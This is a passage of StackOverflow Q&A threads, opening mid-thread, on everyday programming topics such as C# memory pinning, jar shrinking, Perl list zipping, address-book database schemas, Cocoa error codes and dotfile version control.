A: The best advice regarding descriptors I give to any new Symbian developer in my company is to try and avoid using the descriptors when not necessary. The Symbian SDK has the libc API which includes stdio, stdlib, string and more. I usually use char* types and when necessary I convert it to a descriptor (when I need to send a string to an SDK method which requires it).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38299",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Pinning pointer arrays in memory I'm currently working on a ray-tracer in C# as a hobby project. I'm trying to achieve a decent rendering speed by implementing some tricks from a c++ implementation and have run into a spot of trouble.
The objects in the scenes which the ray-tracer renders are stored in a KdTree structure and the tree's nodes are, in turn, stored in an array. The optimization I'm having problems with is while trying to fit as many tree nodes as possible into a cache line. One means of doing this is for nodes to contain a pointer to the left child node only. It is then implicit that the right child follows directly after the left one in the array.
The nodes are structs and during tree construction they are successfully put into the array by a static memory manager class. When I begin to traverse the tree it, at first, seems to work just fine. Then at a point early in the rendering (about the same place each time), the left child pointer of the root node is suddenly pointing at a null pointer. I have come to the conclusion that the garbage collector has moved the structs as the array lies on the heap.
I've tried several things to pin the addresses in memory but none of them seems to last for the entire application lifetime as I need. The 'fixed' keyword only seems to help during single method calls and declaring 'fixed' arrays can only be done on simple types which a node isn't. Is there a good way to do this or am I just too far down the path of stuff C# wasn't meant for.
Btw, changing to c++, while perhaps the better choice for a high performance program, is not an option.
A: Firstly, if you're using C# normally, you can't suddenly get a null reference due to the garbage collector moving stuff, because the garbage collector also updates all references, so you don't need to worry about it moving stuff around.
You can pin things in memory but this may cause more problems than it solves. For one thing, it prevents the garbage collector from compacting memory properly, and may impact performance in that way.
One thing I would say from your post is that using structs may not help performance as you hope. C# fails to inline any method calls involving structs, and even though they've fixed this in their latest runtime beta, structs frequently don't perform that well.
Personally, I would say C++ tricks like this don't generally tend to carry over too well into C#. You may have to learn to let go a bit; there can be other more subtle ways to improve performance ;)
A: What is your static memory manager actually doing? Unless it is doing something unsafe (P/Invoke, unsafe code), the behaviour you are seeing is a bug in your program, and not due to the behaviour of the CLR.
Secondly, what do you mean by 'pointer', with respect to links between structures? Do you literally mean an unsafe KdTree* pointer? Don't do that. Instead, use an index into the array. Since I expect that all nodes for a single tree are stored in the same array, you won't need a separate reference to the array. Just a single index will do.
Finally, if you really really must use KdTree* pointers, then your static memory manager should allocate a large block using e.g. Marshal.AllocHGlobal or another unmanaged memory source; it should both treat this large block as a KdTree array (i.e. index a KdTree* C-style) and it should suballocate nodes from this array, by bumping a "free" pointer.
If you ever have to resize this array, then you'll need to update all the pointers, of course.
The basic lesson here is that unsafe pointers and managed memory do not mix outside of 'fixed' blocks, which of course have stack frame affinity (i.e. when the function returns, the pinned behaviour goes away). There is a way to pin arbitrary objects, like your array, using GCHandle.Alloc(yourArray, GCHandleType.Pinned), but you almost certainly don't want to go down that route.
You will get more sensible answers if you describe in more detail what you are doing.
A: If you really want to do this, you can use the GCHandle.Alloc method to specify that a pointer should be pinned without being automatically released at the end of the scope like the fixed statement.
But, as other people have been saying, doing this is putting undue pressure on the garbage collector. What about just creating a struct that holds onto a pair of your nodes and then managing an array of NodePairs rather than an array of nodes?
If you really do want to have completely unmanaged access to a chunk of memory, you would probably be better off allocating the memory directly from the unmanaged heap rather than permanently pinning a part of the managed heap (this prevents the heap from being able to properly compact itself). One quick and simple way to do this would be to use Marshal.AllocHGlobal method.
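A rough sketch of that unmanaged-heap approach, assuming a hypothetical KdNode struct and a known nodeCount (no resizing and no error handling):
int nodeSize = Marshal.SizeOf(typeof(KdNode));              // KdNode is your node struct
IntPtr block = Marshal.AllocHGlobal(nodeCount * nodeSize);  // this memory is never moved by the GC
unsafe
{
    KdNode* nodes = (KdNode*)block.ToPointer();   // treat the block as a C-style array
    nodes[0].LeftChild = 1;                       // indices/addresses stay stable for the app lifetime
}
// ... much later, when the tree is no longer needed:
Marshal.FreeHGlobal(block);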
A: Is it really prohibitive to store the pair of array reference and index?
A:
What is your static memory manager actually doing? Unless it is doing something unsafe (P/Invoke, unsafe code), the behaviour you are seeing is a bug in your program, and not due to the behaviour of the CLR.
I was in fact speaking about unsafe pointers. What I wanted was something like Marshal.AllocHGlobal, though with a lifetime exceeding a single method call. On reflection it seems that just using an index is the right solution as I might have gotten too caught up in mimicking the c++ code.
One thing I would say from your post is that using structs may not help performance as you hope. C# fails to inline any method calls involving structs, and even though they've fixed this in their latest run-time beta, structs frequently don't perform that well.
I looked into this a bit and I see it has been fixed in .NET 3.5SP1; I assume that's what you were referring to as the run-time beta. In fact, I now understand that this change accounted for a doubling of my rendering speed. Now, structs are aggressively in-lined, improving their performance greatly on X86 systems (X64 had better struct performance in advance).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38302",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How do I strip the fluff out of a third party library? It may not be best practice but are there ways of removing unsused classes from a third party's jar files. Something that looks at the way in which my classes are using the library and does some kind of coverage analysis, then spits out another jar with all of the untouched classes removed.
Obviously there are issues with this. Specifically, the usage scenario I put it though may not use all classes all the time.
But neglecting these problems, can it be done in principle?
A: There is a way.
The JarJar project does this AFAIR. The first goal of the JarJar project is to allow one to embed third party libraries in your own jar, changing the package structure if necessary. Doing so it can strip out the classes that are not needed.
Check it out at http://code.google.com/p/jarjar/.
Here is a link about shrinking jars: http://sixlegs.com/blog/java/jarjar-keep.html
A: There is a tool in Ant called a classfileset. You specify the list of root classes that you know you need, and then the classfileset recursively analyzes their code to find all dependencies.
Alternatively, you could develop a good test suite that exercises all of the functions that you need, then run your tests under a test coverage tool. The tool will tell you which classes (and statement in them) were actually utilized. This could give you an even smaller set of code than what you'd find with static analysis.
A: I use ProGuard for this. As well as being an excellent obfuscator, it has a code shrinking phase which can combine multiple JARs and then strip out any unused classes or class members. It does an excellent job at shrinking.
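For reference, a shrink-only ProGuard configuration might look something like the following (the jar names and the entry-point class are placeholders, and you would add -keep rules for anything reached via reflection):
-injars  library.jar
-injars  myapp.jar
-outjars myapp-trimmed.jar
-libraryjars <java.home>/lib/rt.jar
-dontoptimize
-dontobfuscate
-keep public class com.example.Main {
    public static void main(java.lang.String[]);
}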
A: At a previous job, I used a Java obfuscator that as well as obfuscating the code, also removed classes and methods that weren't being used. If you were doing "Class.byName" or any other type of reflection stuff, you needed to tell the obfuscator because it couldn't tell by inspecting the code what classes or methods called by reflection.
The problem, of course, is that you don't know if other parts of the third party library are doing any reflection, and so removing an "unused" class might cause things to break in an obscure case that you haven't tested.
A: jar is just a zip file, so I guess you can. If you could get to the source, it's cleaner. Maybe try disassembling the class?
A: Adding to this question: can that improve performance? Since the unused classes would not be JIT compiled, would that improve startup time, or does Java automatically detect this while compiling to bytecode and not even deal with the code that is not used?
A: This would be an interesting project (has anyone done it already?)
I presume you'd give the tool your jar(s) as a starting point, and the library jar to clean up. It could use reflection to determine which classes your jar(s) reference directly, and which are used indirectly down the call tree (this is not trivial at all, but doable). If it encounters any reflection code in either of the two places, it should give a very loud warning.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38305",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Is there any way to draw an image to use 4 points rather than 3 (perspective warp) Drawing a parallelogram is nicely supported with Graphics.DrawImage:
Bitmap destImage = new Bitmap(srcImage.Width, srcImage.Height);
using (Graphics gr = Graphics.FromImage(destImage))
{
    // Three points define a parallelogram: upper-left, upper-right, lower-left
    PointF[] destPts = new PointF[] { new PointF(x1, y1),
        new PointF(x2, y2), new PointF(x4, y4) };
    gr.DrawImage(srcImage, destPts);
}
How, do you do 4 points (obviously the following is not supported, but this is what is wanted):
Bitmap destImage = new Bitmap(srcImage.Width, srcImage.Height);
using (Graphics gr = Graphics.FromImage(destImage))
{
    // A fourth point (a full perspective warp) is not supported by this overload
    PointF[] destPts = new PointF[] { new PointF(x1, y1), new PointF(x2, y2),
        new PointF(x3, y3), new PointF(x4, y4) };
    gr.DrawImage(srcImage, destPts);
}
A: Normally you would do this with a 3x3 Matrix, but the Matrix class only lets you specify 6 values instead of 9. You might be able to do this in DirectX.
A: When thinking of how 3D tools would handle it... try drawing a triangle of one half and then the other triangle for the other half. So if you have points A, B, C, & D; you would draw (with a clipping plane) A, B, C and then B, C, D, or something of the sort.
A: I found the following article in CodeProject:
Free Image Transformation By YLS
It needs some work, but maybe you can use this :)
A: Closest I can find is this information, which is extremely laggy.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38308",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: VMware or Hyper-V for Developers I'm looking to replace a couple of machines in the office with a more powerful multi-processor machine running either VMware or Microsoft's Hyper-V with a view to hosting a mix of Windows Server 2003, Windows Server 2008 and Linux operating systems. The machines are used mainly for testing ASP.Net or Perl web sites. I don't need advanced features like live migration of running systems but it would be useful to be able to restore a machine to a known state. Performance is not really a big issue either unless one is noticeable faster than the other.
My question is: Should I play safe and go with VMware or is Hyper-V mature enough to be a candidate?
A: Hyper-V works quite well and even supports Linux VMs. The main advantage is that if you are already running Windows Server 2008 it comes along for free, whereas you have to pay for VMware separately. I think that VMware provides better system management tools, but that isn't really a big benefit in this particular case.
I personally have used Hyper-V for development, i.e. running a vista machine for testing on top of a server 2008 box.
A: My problem with Hyper-V is that it kills performance on some things on the host OS, especially A/V stuff. Whenever I would be playing music on the host OS and do something that hits the disk hard (like compiling), the music would begin skipping. Similarly, playing streaming video, you'd have to wait until it was completely downloaded before it would play without skipping.
I've since switched back to VMware and couldn't be happier.
A: I like vmware. One nice feature is that it runs on multiple host OS's, so you can move your guest OS onto a linux server or a windows desktop as you like.
A: VMware did recently release a free version of ESXi recently.
VMware has a few advantages:
1. VMware virtual machines are portable across different types of hardware. IIRC, Hyper-V uses the drivers from the Host OS.
2. VMware virtual machines are portable across different VMware products (although you may need to use their converter tool to go from some hosted virtual machines to ESX or ESXi).
3. The VMware platforms have been in use much longer, and are quite mature products and generally better-known for troubleshooting.
With VMware, you could develop and test a virtual machine on your local system using VMware Workstation, Fusion, Server, or Player, and then deploy it to a production server later. With Hyper-V, I believe you would have to build the virtual machine on the target box for best results. If performance isn't really that big of an issue, then VMware Server may be the best option, for it can run most .vmx machines directly and is generally a bit easier to manage; if performance becomes critical, you still have the ESX or ESXi upgrade option that you can use those same virtual machines with.
This entry talks about how Virtual Server machines will not run on Hyper-V:
http://blogs.technet.com/jhoward/archive/2008/02/28/are-vhds-compatible-between-hyper-v-and-virtual-server-and-virtual-pc.aspx
A: A quick note regarding Windows Vista as a host for VMware Server, it doesn't work as well with Vista as the host OS compared to Windows XP as the host. The system pretty much locks up while VMware server 'boots' a virtual machine. After that has taken place, it isn't too bad to use. VMware Server 2.0 should fix these issues with Vista as the host OS. (I was using Vista Business RTM)
Also of note: VMware forbids any type of benchmarking to be posted on the internet unless they authorize the data (i.e. you will not see any benchmarks that show VMware as slower than Tech X). The rumor mill states that you can see better performance with Hyper-V, xVM (Sun's enterprise version of VirtualBox) and Xen. However, these things you would have to look into yourself, as you won't really find anything via Google.
A: Necroing the thread: just wanted to add my 2c since it has been a while since the last post.
I have been using VMWare Server since version 1.6 all the way up to 2.0.
Just out of curiosity, I tried out Hyper-V, and there's a real definitive performance gain. Hyper-V is plain faster.
Switched over 2 months ago and never looked back.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38323",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: On the web, what fonts should I use to create an equivalent experience cross-platform? Because Linux (and its variants) have a completely different set of fonts than Windows and Mac OS X, is there anyone with any experience of creating cross-platform font families - ideally finding equivalents to the common fonts found on the aforementioned operating systems?
If so, what is the best route to take?
A: List of Web Safe Fonts.
A: Most OSes have support for Microsoft's Core Fonts For the Web. They all come bundled with OS X, and I'm reasonably sure they'll work (or have near-identical variants) on most any Linux distro.
The Microsoft Typography page is also pretty cool
A: Just to clarify: You are looking for names of fonts that will make your website-design look similar to Windows and Mac OS X when viewed under Linux, you are not looking to design new fonts, correct?
(I read your question in the same way that Jason Navarrete did, so at least two people misunderstood your question.)
The font names you are looking for might be something like the Liberation fonts that RedHat has released?
Incidently, 'sans-serif' doesn't give the user "any sans-serif", it gives the user his/her preferred sans-serif - which may arguably be better than one you pick.
A: Well, this is a hard question.
There are generally 3 fonts that are, in some form or other, always supported. These fonts are Adobe Times, Adobe Helvetica, and Adobe Courier. The problem is that while every system and foundry has a clone of these, the clones have different names. They are also not entirely the same, but have the same metrics. The Windows trio of Arial, Times New Roman, and Courier New are the Monotype clones of them. On Linux these have been provided as bitmap fonts by Adobe, and as outlines in the form of the URW Nimbus {Sans, Roman, Mono} clones. The outlines, however, are not pretty on screen (they are on a printer) as they lack hinting.
The solution would be to go for a multichoice for websites. As Microsoft has at some point made the "core fonts" available for redistribution, many Unix/Linux systems do have those fonts available, so go with them. The Liberation fonts are straight clones of the MS/Monotype fonts, so they should be OK as alternatives with a similar experience. Then go for "Helvetica", "Times", and "Courier" before the sans/serif/mono choice that puts you in the user's hands.
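In CSS that multichoice would look something like the following (the exact stacks are a matter of taste):
body      { font-family: Arial, Helvetica, "Liberation Sans", "Nimbus Sans L", sans-serif; }
h1, h2    { font-family: "Times New Roman", Times, "Liberation Serif", "Nimbus Roman No9 L", serif; }
pre, code { font-family: "Courier New", Courier, "Liberation Mono", "Nimbus Mono L", monospace; }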
A: Sitepoint has an excellent article on font stacks:
http://www.sitepoint.com/article/eight-definitive-font-stacks/
A: Here are some good up-to-date listings of the most-installed fonts for PC, Mac, and Linux:
Sans serif font sampler and survey results
Serif font sampler and survey results
Hope this helps your decision!
A:
TrueType Fonts (TTF) will generally work on Windows, Mac, and Linux platforms.
Thanks Jason, but this isn't the answer I'm looking for. Many Linux distributions come with their own fonts that are different in name to the Mac/Windows versions - presumably because of font licensing issues.
I'd like a response from a Linux user (preferably developer) who has experience with coming up with similar looking fonts. I really don't want to have to give Ubuntu Firefox users 'any sans-serif'.
A: This article explains the basic approach that has the most chance of working cross-platform. You have to think in terms of stacks which are sets of broadly similar fonts which cover most platforms.
You are always safe saying 'serif' which will get you Times New Roman or similar or sans-serif which will get you Helvetica/Arial or similar on most platforms. Then as the article suggests you can go further and distinguish between 'wide' and 'narrow' groupings.
You can take a more 'progressive enhancement' approach choosing your ideal font and providing generic substitutes for those platforms which do not have it. However at the end of the day the web is not print and you only get approximate control over font choice. You can do a lot of custom typography using the well-supported CSS properties such as line-spacing. But you will never be able to say 'use this font' and have it work the identically even across Mac/Windows/Linux let alone mobile devices, kiosks etc...
A: TrueType Fonts (TTF) will generally work on Windows, Mac, and Linux platforms.
http://en.wikipedia.org/wiki/TrueType
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38336",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "27"
} |
Q: Is there an elegant zip to interleave two lists in Perl 5? I recently "needed" a zip function in Perl 5 (while I was thinking about How do I calculate relative time?), i.e. a function that takes two lists and "zips" them together to one list, interleaving the elements.
(Pseudo)example:
@a=(1, 2, 3);
@b=('apple', 'orange', 'grape');
zip @a, @b; # (1, 'apple', 2, 'orange', 3, 'grape');
Haskell has zip in the Prelude and Perl 6 has a zip operator built in, but how do you do it in an elegant way in Perl 5?
A:
my @l1 = qw/1 2 3/;
my @l2 = qw/7 8 9/;
my @out;
push @out, shift @l1, shift @l2 while ( @l1 || @l2 );
If the lists are different lengths, this will put undef in the extra slots, but you can easily remedy that if you don't want it. Something like ( @l1[0] && shift @l1 ) would do it.
Hope this helps!
A: Assuming you have exactly two lists and they are exactly the same length, here is a solution originally by merlyn (Randal Schwartz), who called it perversely perlish:
sub zip2 {
my $p = @_ / 2;
return @_[ map { $_, $_ + $p } 0 .. $p - 1 ];
}
What happens here is that for a 10-element list, first, we find the pivot point in the middle, in this case 5, and save it in $p. Then we make a list of indices up to that point, in this case 0 1 2 3 4. Next we use map to pair each index with another index that’s at the same distance from the pivot point as the first index is from the start, giving us (in this case) 0 5 1 6 2 7 3 8 4 9. Then we take a slice from @_ using that as the list of indices. This means that if 'a', 'b', 'c', 1, 2, 3 is passed to zip2, it will return that list rearranged into 'a', 1, 'b', 2, 'c', 3.
This can be written in a single expression along ysth’s lines like so:
sub zip2 { @_[map { $_, $_ + @_/2 } 0..(@_/2 - 1)] }
Whether you’d want to use either variation depends on whether you can see yourself remembering how they work, but for me, it was a mind expander.
A: The List::MoreUtils module has a zip/mesh function that should do the trick:
use List::MoreUtils qw(zip);
my @numbers = (1, 2, 3);
my @fruit = ('apple', 'orange', 'grape');
my @zipped = zip @numbers, @fruit;
Here is the source of the mesh function:
sub mesh (\@\@;\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@) {
my $max = -1;
$max < $#$_ && ($max = $#$_) for @_;
map { my $ix = $_; map $_->[$ix], @_; } 0..$max;
}
A: Algorithm::Loops is really nice if you do much of this kind of thing.
My own code:
sub zip { @_[map $_&1 ? $_>>1 : ($_>>1)+($#_>>1), 1..@_] }
A: I find the following solution straightforward and easy to read:
@a = (1, 2, 3);
@b = ('apple', 'orange', 'grape');
@zipped = map {($a[$_], $b[$_])} (0 .. $#a);
I believe it's also faster than solutions that create the array in a wrong order first and then use slice to reorder, or solutions that modify @a and @b.
A: For arrays of the same length:
my @zipped = ( @a, @b )[ map { $_, $_ + @a } ( 0 .. $#a ) ];
A: This is totally not an elegant solution, nor is it the best solution by any stretch of the imagination. But it's fun!
package zip;
sub TIEARRAY {
my ($class, @self) = @_;
bless \@self, $class;
}
sub FETCH {
my ($self, $index) = @_;
$self->[$index % @$self][$index / @$self];
}
sub STORE {
my ($self, $index, $value) = @_;
$self->[$index % @$self][$index / @$self] = $value;
}
sub FETCHSIZE {
my ($self) = @_;
my $size = 0;
@$_ > $size and $size = @$_ for @$self;
$size * @$self;
}
sub CLEAR {
my ($self) = @_;
@$_ = () for @$self;
}
package main;
my @a = qw(a b c d e f g);
my @b = 1 .. 7;
tie my @c, zip => \@a, \@b;
print "@c\n"; # ==> a 1 b 2 c 3 d 4 e 5 f 6 g 7
How to handle STORESIZE/PUSH/POP/SHIFT/UNSHIFT/SPLICE is an exercise left to the reader.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38345",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "27"
} |
Q: Finding all messages with a given PR_SEARCH_KEY I need to query an Exchange server to find all messages having a certain value in PR_SEARCH_KEY. Do I have to open every mailbox and iterate through it or is there a faster solution?
Edit: This is for a program that needs to prepend something to the subject line of all copies of a message I got through a journal mailbox.
A: You haven't gotten any answers yet so I figured I would try a sub-optimal solution.
I'm not sure that you will be able to do what you need to do with the tool I'm going to propose (and, perhaps you are beyond this possible solution), but have you tried to find the messages of interest using ExMerge?
I've found that ExMerge can track down specific messages and get them for me across multiple mailboxes. It doesn't look like you can get directly to the PR_SEARCH_KEY value, but maybe there is another way to skin this cat.
You can download ExMerge at Microsoft Download for ExMerge.
Also, there are some good high-level details on ExMerge at the Microsoft Exchange Team Blog.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38348",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Address book DB schema I need to store contact information for users. I want to present this data on the page as an hCard and downloadable as a vCard. I'd also like to be able to search the database by phone number, email, etc.
What do you think is the best way to store this data? Since users could have multiple addresses, etc., complete normalization would be a mess. I'm thinking about using XML, but I'm not familiar with querying XML db fields. Would I still be able to search for users by contact info?
I'm using SQL Server 2005, if that matters.
A: Consider two tables for People and their addresses:
People (pid, prefix, firstName, lastName, suffix, DOB, ... primaryAddressTag )
AddressBook (pid, tag, address1, address2, city, stateProv, postalCode, ... )
The Primary Key (that uniquely identifies each and every row) of People is pid. The PK of AddressBook is the composition of pid and tag (pid, tag).
Some example data:
People
1, Kirk
2, Spock
AddressBook
1, home, '123 Main Street', Iowa
1, work, 'USS Enterprise NCC-1701'
2, other, 'Mt. Selaya, Vulcan'
In this example, Kirk has two addresses: one 'home' and one 'work'. One of those two can (and should) be noted as a foreign key (like a cross-reference) in People in the primaryAddressTag column.
Spock has a single address with the tag 'other'. Since that is Spock's only address, the value 'other' ought to go in the primaryAddressTag column for pid=2.
This schema has the nice effect of preventing the same person from duplicating any of their own addresses by accidentally reusing tags, while at the same time allowing all other people to use any address tags they like.
Further, with FK references in primaryAddressTag, the database system itself will enforce the validity of the primary address tag (via something we database geeks call referential integrity) so that your -- or any -- application need not worry about it.
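A rough SQL sketch of that two-table design (column types abbreviated, and the circular reference from primaryAddressTag back to AddressBook left out for simplicity):
CREATE TABLE People (
    pid               INT          NOT NULL,
    firstName         VARCHAR(100),
    lastName          VARCHAR(100),
    primaryAddressTag VARCHAR(20),
    PRIMARY KEY (pid)
);

CREATE TABLE AddressBook (
    pid        INT         NOT NULL,
    tag        VARCHAR(20) NOT NULL,
    address1   VARCHAR(255),
    city       VARCHAR(100),
    postalCode VARCHAR(20),
    PRIMARY KEY (pid, tag),
    FOREIGN KEY (pid) REFERENCES People (pid)
);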
A: Why would complete normalization "be a mess"? This is exactly the kind of thing that normalization makes less messy.
A: Don't be afraid of normalizing your data. Normalization, like John mentions, is the solution not the problem. If you try to denormalize your data just to avoid a couple joins, then you're going to cause yourself serious trouble in the future. Trying to refactor this sort of data down the line after you have a reasonable size dataset WILL NOT BE FUN.
I strongly suggest you check out Highrise from 36 Signals. It was recently recommended to me when I was looking for an online contact manager. It does so much right. Actually, my only objection so far with the service is that I think the paid versions are too expensive -- that's all.
As things stand today, I do not fit into a flat address profile. I have 4-5 e-mail addresses that I use regularly, 5 phone numbers, 3 addresses, several websites and IM profiles, all of which I would include in my contact profile. If you're starting to build a contact management system now and you're unencumbered by architectural limitations (think Gmail contacts being keyed to a single email address), then do your users a favor and make your contact structure as flexible (normalized) as possible.
Cheers, -D.
A: I'm aware of SQLite, but that doesn't really help - I'm talking about figuring out the best schema (regardless of the database) for storing this data.
A: Per John, I don't see what the problem with a classic normalised schema would be. You haven't given much information to go on, but you say that there's a one-to-many relationship between users and addresses, so I'd plump for a bog standard solution with a foreign key to the user in the address relation.
A: If you assume each user has one or more addresses, a telephone number, etc., you could have a 'Users' table, an 'Addresses Table' (containing a primary key and then non-unique reference to Users), the same for phone numbers - allowing multiple rows with the same UserID foreign key, which would make querying 'all addresses for user X' quite simple.
A: I don't have a script, but I do have mySQL that you can use. Before that I should mentioned that there seem to be two logical approaches to storing vCards in SQL:
*
*Store the whole card and let the database search (possibly) huge text strings, and process them in another part of your code or even client side, e.g.
CREATE TABLE IF NOT EXISTS vcards (
name_or_letter varchar(250) NOT NULL,
vcard text NOT NULL,
timestamp timestamp default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
PRIMARY KEY (name_or_letter)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
Probably easy to implement, (depending on what you are doing with the data) though your searches are going to be slow if you have many entries.
If this is just for you then this might work, (if it is any good then it is never just for you.) You can then process the vCard client side or server side using some beautiful module that you share, (or someone else shared with you.)
I've watched vCard evolve and know that there is going to be some change at /some/ time in the future, so I use three tables. The first is the card (this mostly links back to my existing tables - if you don't need this then yours can be a cut-down version). The second is the card definitions (which seem to be called profile in vCard speak). The last is all the actual data for the cards.
Because I let DBIx::Class (yes, I'm one of those) do all of the database work, this (three tables) seems to work rather well for me (though obviously you can tighten up the types to match rfc2426 more closely, but for the most part each piece of data is just a text string).
The reason that I don't normalize out the address from the person is that I already have an address table in my database and these three are just for non-user contact details.
CREATE TABLE `vCards` (
`card_id` int(255) unsigned NOT NULL AUTO_INCREMENT,
`card_peid` int(255) DEFAULT NULL COMMENT 'link back to user table',
`card_acid` int(255) DEFAULT NULL COMMENT 'link back to account table',
`card_language` varchar(5) DEFAULT NULL COMMENT 'en en_GB',
`card_encoding` varchar(32) DEFAULT 'UTF-8' COMMENT 'why use anything else?',
`card_created` datetime NOT NULL,
`card_updated` datetime NOT NULL,
PRIMARY KEY (`card_id`) )
ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='These are the contact cards'
create table vCard_profile (
vcprofile_id int(255) unsigned auto_increment NOT NULL,
vcprofile_version enum('rfc2426') DEFAULT "rfc2426" COMMENT "defaults to vCard 3.0",
vcprofile_feature char(16) COMMENT "FN to CATEGORIES",
vcprofile_type enum('text','bin') DEFAULT "text" COMMENT "if it is too large for vcd_value then user vcd_bin",
PRIMARY KEY (`vcprofile_id`)
) COMMENT "These are the valid types of card entry";
INSERT INTO vCard_profile VALUES('','rfc2426','FN','text'),('','rfc2426','N','text'),('','rfc2426','NICKNAME','text'),('','rfc2426','PHOTO','bin'),('','rfc2426','BDAY','text'),('','rfc2426','ADR','text'),('','rfc2426','LABEL','text'),('','rfc2426','TEL','text'),('','rfc2426','EMAIL','text'),('','rfc2426','MAILER','text'),('','rfc2426','TZ','text'),('','rfc2426','GEO','text'),('','rfc2426','TITLE','text'),('','rfc2426','ROLE','text'),('','rfc2426','LOGO','bin'),('','rfc2426','AGENT','text'),('','rfc2426','ORG','text'),('','rfc2426','CATEGORIES','text'),('','rfc2426','NOTE','text'),('','rfc2426','PRODID','text'),('','rfc2426','REV','text'),('','rfc2426','SORT-STRING','text'),('','rfc2426','SOUND','bin'),('','rfc2426','UID','text'),('','rfc2426','URL','text'),('','rfc2426','VERSION','text'),('','rfc2426','CLASS','text'),('','rfc2426','KEY','bin');
create table vCard_data (
vcd_id int(255) unsigned auto_increment NOT NULL,
vcd_card_id int(255) NOT NULL,
vcd_profile_id int(255) NOT NULL,
vcd_prof_detail varchar(255) COMMENT "work,home,preferred,order for e.g. multiple email addresses",
vcd_value varchar(255),
vcd_bin blob COMMENT "for when varchar(255) is too small",
PRIMARY KEY (`vcd_id`)
) COMMENT "The actual vCard data";
This isn't the best SQL but I hope that helps.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38352",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Error Code Reference for OSX/Cocoa If I get an error code result from a Cocoa function, is there any easy way to figure out what it means (other than by grepping through all the .h files in the framework bundles)?
A: The sections on 'Error Domains' and 'Error Codes' in Apple's Error Handling Programming Guide address this reasonably well. You need to do the following:
*
*Log the error, taking note of both the error domain (a human-readable / Googleable string that tells you where to look for the error code definitions) and the error code itself (an integer)
*Sniff around on Google (or read from the list below) and figure out the name of the header file(s) where the error codes for that error domain are defined
*Search those header file(s) for the error code you got. You should find both a constant name for the error code (like ENOMEM), and hopefully also an explanatory comment (like /* Cannot allocate memory */) explaining what the error means. If there's no comment, and the constant name isn't self-explanatory, just Google the constant name and you'll probably find a proper description.
Some header files of major error domains:
NSCocoaErrorDomain
Error code declarations are spread across three header files:
*
*<Foundation/FoundationErrors.h> (Generic Foundation error codes)
*<AppKit/AppKitErrors.h> (Generic AppKit error codes)
*<CoreData/CoreDataErrors.h> (Core Data error codes)
NSURLErrorDomain
Check NSURLError.h
NSXMLParserErrorDomain
Check NSXMLParser.h
NSMachErrorDomain
Check /usr/include/mach/kern_return.h
NSPOSIXErrorDomain
Check /usr/include/sys/errno.h
NSOSStatusErrorDomain
Check
/System/Library/Frameworks/CoreServices.framework/Frameworks/CarbonCore.framework/Headers/MacErrors.h
A: You should look at the <Framework/FrameworkErrors.h> header for whatever framework the method you're using that's returning an error comes from.
For example, an NSError in the Cocoa domain that you get from a method in the Foundation framework will have its code property described in the <Foundation/FoundationErrors.h> header. Similarly with AppKit and <AppKit/AppKitErrors.h> and Core Data and <CoreData/CoreDataErrors.h>.
Also, if you print the description of the NSError in the debugger, it should include not only the error domain and code, but also the name of the actual error code constant so you can look it up in the API reference.
A: Also, Cocoa's NSError is meant to be displayable to the end user. If you just log it, it should be readable.
If you're talking about Carbon's OSStatus and such, MacErrors.h.
A: For NSError errors add a line of code:
NSError *error;
// ... Some code that returns an error
// Get the error as a string
NSString *s = [error localizedDescription];
// Observe the code for yourself or display to the user.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38357",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Best version control system for managing home directories I have 3 Linux machines, and want some way to keep the dotfiles in their home directories in sync. Some files, like .vimrc, are the same across all 3 machines, and some are unique to each machine.
I've used SVN before, but all the buzz about DVCSs makes me think I should try one - is there a particular one that would work best with this? Or should I stick with SVN?
A: I've had this problem for years, and I don't think version control is necessarily the right way to go. I've had good success with the Unison file synchronizer which is designed for the express purpose of maintaining consistent home directories on two machines. I'm currently managing seven replicas with unison, and the details are a bit tricky, but it is a great tool and if you start with two you will be extremely pleased.
The key difference between Unison and a VCS is that Unison is willing to delay dealing with conflicts that have to be merged. Plus it gets all the defaults right. And it is fast: I use it daily, over a DSL line, to synchronize about 40GB of data.
A: Any DVCS would likely work fine. My favorite is Bazaar. It would be easiest to keep your config files in .config, version that, and then symlink as appropriate.
A benefit of DVCS is that you can version the per-machine config files as well, without interfering with versioning global configs.
A: I've had the same problem, and built a tool on top of Subversion that adds permission, ownership and SELinux context tracking, keeps the .svn directories out of the actually versioned trees, and adds a concept of layers so you can, for example, track all your config related to development, which you then only check out on machines you use for developing.
This has helped me organize my settings much better across the 50+ machines I log into.
Here's the project page. It's still a little rough around the edges, but we also use it at work to version system configuration for our 60+ servers.
In general, any version control system that uses some sort of metadata files to track stuff is going to cause you pain as is when actually using it.
A: Version control software isn't really great for home directories. Worse, some software doesn't really like the .svn folders or starts to interpret their contents. You could of course try to fix this with some very complex mirroring setup, but that's hard.
A: Here's a Mozilla developer that's tried to do this: Version controlling my home dir; there are a couple of suggestions in the comments.
